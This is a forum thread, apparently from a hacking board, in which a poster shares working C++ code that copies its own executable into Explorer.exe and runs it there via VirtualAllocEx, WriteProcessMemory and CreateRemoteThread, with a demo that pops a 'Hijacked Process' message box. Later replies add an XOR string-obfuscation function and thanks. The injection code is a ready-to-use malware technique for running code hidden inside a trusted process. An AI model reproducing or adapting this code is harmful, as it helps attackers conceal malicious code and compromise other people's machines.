[C++] Process Injection

Dwar · 2010-11-29, 04:11 PM

Process Injection

This project allows you to copy the local process into another remote process and execute it. There are no requirements for your program for this to work. All you do is call the function, and sit back and the program will run inside the remote address space just as if it was in it's own. You do not need to pass memory addresses to the thread because, the Injected program is set at it's own original address in memory so all variables and functions defined will still work.
But this will not work on all running processes because the ImageBase required by the injector executable maybe already Allocated by the process, therefore causing the VirtualAllocEx to fail. If you were to make this work on all process you would first have to rebase the injector in memory, then inject it.
The default imagebase for an executable most of the time is 0x400000 which is available in Explorer.exe, so this process was chosen as example.

inject.h

 /* Injection Prototypes */

#include <windows.h>



BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam);

inject.h

 #include "inject.h"



BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam)

{

	HMODULE hModule, hNewModule;

	DWORD dwSize;

	HANDLE hProcess;



	IMAGE_DOS_HEADER ImageDosHeader;

	IMAGE_OPTIONAL_HEADER32 ImageOptionalHeader;



	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

	

	if (hProcess == NULL)

	{

		return FALSE;

	}



	hModule = GetModuleHandle(NULL);



	CopyMemory(&ImageDosHeader, hModule, sizeof(ImageDosHeader));



	CopyMemory(&ImageOptionalHeader, ((BYTE *)hModule + sizeof(DWORD) + ImageDosHeader.e_lfanew + sizeof(IMAGE_FILE_HEADER)), sizeof(ImageOptionalHeader));



	dwSize = ImageOptionalHeader.SizeOfImage;



	hNewModule = VirtualAllocEx(hProcess, hModule, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	

	if (hNewModule == NULL)

	{

		return FALSE;

	}

		

	WriteProcessMemory(hProcess, hNewModule, hModule, dwSize, NULL);



	CreateRemoteThread(hProcess, 0, 0, lpStartProc, lpParam,	 0, NULL);



	return TRUE;

}

example.c

 #include "inject.h"



DWORD WINAPI RemFunc(LPVOID lpParam);



void WinMainCRTStartup()

{

	DWORD dwPid;

	

	GetWindowThreadProcessId(FindWindow("ProgMan", NULL), &dwPid);



	InjectExecutable(dwPid, &RemFunc, NULL);

}



DWORD WINAPI RemFunc(LPVOID lpParam)

{

	MessageBox(HWND_DESKTOP, "Greetings from the Hijacked Process!!!!nDone with ProcessInjectionn.::ANUBIS::.", "Explorer", MB_OK);

	ExitThread(0);

	return 0;

}

Author: ANUBIS

11moon11 · 2013-07-24, 05:52 PM

Function, which made your text crypted:

Code:

//---------------------------------------------------------------------------
AnsiString XOR_Crypt(AnsiString in, AnsiString pass)
{
        AnsiString out;
        for (int x=1;x<in.Length()+1;x++)
        {
                out += (char)(in[x] ^ pass[x%pass.Length()+1]);
        }
        return out;
}

And how to crypt your text:

Code:

ShowMessage(XOR_Crypt("pass", "text"));

PROFIT!

Viloresi · 2014-06-29, 08:00 PM

this is the most common injection and for what i can see this doesn't use kernel functions... so thank you very much for sharing

Thread: [C++] Process Injection

Thread Tools

Display

[C++] Process Injection

XOR Crypt! C++

Thanks

Posting Permissions